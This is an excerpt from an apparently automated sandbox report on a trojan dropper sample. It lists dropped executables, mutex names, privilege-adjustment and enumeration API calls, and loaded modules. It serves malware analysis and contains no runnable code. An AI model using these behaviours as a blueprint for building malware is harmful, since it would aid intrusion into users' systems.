        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_004091DC SetErrorMode,GetLogicalDriveStringsA,GetVolumeInformationA,GetDiskFreeSpaceExA,GetDriveTypeA,3_2_004091DC
        Source: C:\Users\user\AppData\Local\Temp\StartUpHost.exeCode function: 3_2_00402D70 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_00402D70
        Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\SecuriteInfo.com.Trojan.MulDrop.1161.895.exe.logJump to behavior
        Source: C:\Users\user\AppData\Roaming\Install\Host.exeMutant created: \Sessions\1\BaseNamedObjects\IHDqxKdm
        Source: C:\Users\user\AppData\Local\Temp\build.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\ope8111.tmpJump to behavior
        Source: SecuriteInfo.com.Trojan.MulDrop.1161.895.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop.1161.895.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior